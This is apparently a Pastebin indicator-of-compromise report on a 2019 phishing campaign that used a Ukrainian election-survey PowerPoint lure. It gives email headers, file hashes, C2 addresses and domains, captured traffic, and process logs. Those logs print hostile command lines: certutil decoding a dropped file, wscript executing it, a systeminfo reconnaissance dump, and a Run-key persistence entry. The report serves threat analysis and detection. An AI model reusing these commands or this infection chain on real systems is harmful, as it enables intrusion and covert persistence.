Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #APT #XML_RELS #WSH #EXE_Less #Recon
- https://pastebin.com/kiSbFi36
- attack_vector
- --------------
- email attach .ZIP > .PPSX > XML_RELS > GET > WSH > %temp%\tmp4E07.tmp > %userprofile%\NTUSR.DAT
- email_headers
- --------------
- Received: from o1.31pqt.s2shared.stmpendgrid.net ([167.89.100.227])
- Received: by filter0029p3iad2.sendgrid.net
- Received: from OTQ2MjY1Mw (host-94-103-82-136.hosted-by-vdsina.ru [94.103.82.136]) by ismtpd0007p1lon1.sendgrid.net
- Date: Thu, 28 Mar 2019 12:46:31 +0000 (UTC)
- From: socis@socis.kiev.ua
- To: user00@victim01
- Subject: ПРЕС-РЕЛІЗ ЗА РЕЗУЛЬТАТАМИ СОЦІОЛОГІЧНОГО ДОСЛІДЖЕННЯ «ПРЕЗИДЕНТСЬКІ ВИБОРИ 2019-БЕРЕЗЕНЬ»
- files
- --------------
- SHA-256 30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72
- File name Prezent_UA_2k_berezen_PRESS.ppsx [Microsoft PowerPoint 2007+]
- File size 391.03 KB (400418 bytes)
- SHA-256 360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f
- File name wj5yuxmp.hmf [XML document, ASCII text, with very long lines, with CRLF]
- File size 272.7 KB (279242 bytes)
- SHA-256 09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b
- File name tmp4E07.tmp [ASCII text, with very long lines, with no line terminators]
- File size 270.93 KB (277430 bytes)
- SHA-256 85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3
- File name NTUSR.DAT [ASCII text, with very long lines, with no line terminators]
- File size 203.19 KB (208070 bytes)
- activity
- **************
- PL_SCR = C2 = 185.176.43.94
- netwrk
- --------------
- 185.176.43.94 socis.cf GET /wj5yuxmp.hmf HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;)
- 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
- comp
- --------------
- POWERPNT.EXE 2844 TCP localhost 49232 185.176.43.94 80 ESTABLISHED
- wscript.exe 1104 TCP localhost 49224 185.176.43.94 80 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE /s C:\Users\operator\Desktop\Prezent_UA_2k_berezen_PRESS.ppsx
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT && timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
- C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT
- C:\Windows\system32\timeout 10
- C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
- C:\Windows\System32\wscript.exe" //B //E:vbs "C:\Users\operator\NTUSR.DAT
- C:\Windows\System32\cmd.exe" /c mode con cp select=65001 | systeminfo > C:\tmp\radB50A0.tmp
- C:\Windows\system32\mode.com con cp select=65001
- C:\Windows\system32\systeminfo.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29.03.2019 12:23
- (Default) c:\users\operator\ntusr.dat 29.03.2019 12:23
- wscript.exe //B //E:vbs "C:\Users\operator\NTUSR.DAT"
- drop
- --------------
- %temp%\tmp4E07.tmp
- %userprofile%\NTUSR.DAT
- # # #
- https://www.virustotal.com/gui/file/30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72/details
- https://www.virustotal.com/gui/file/360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f/details
- https://www.virustotal.com/gui/file/09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b/details
- https://www.virustotal.com/gui/file/85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3/details
- https://urlscan.io/result/83a3366e-12ee-4a6c-a326-a8eb19bc77c7
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement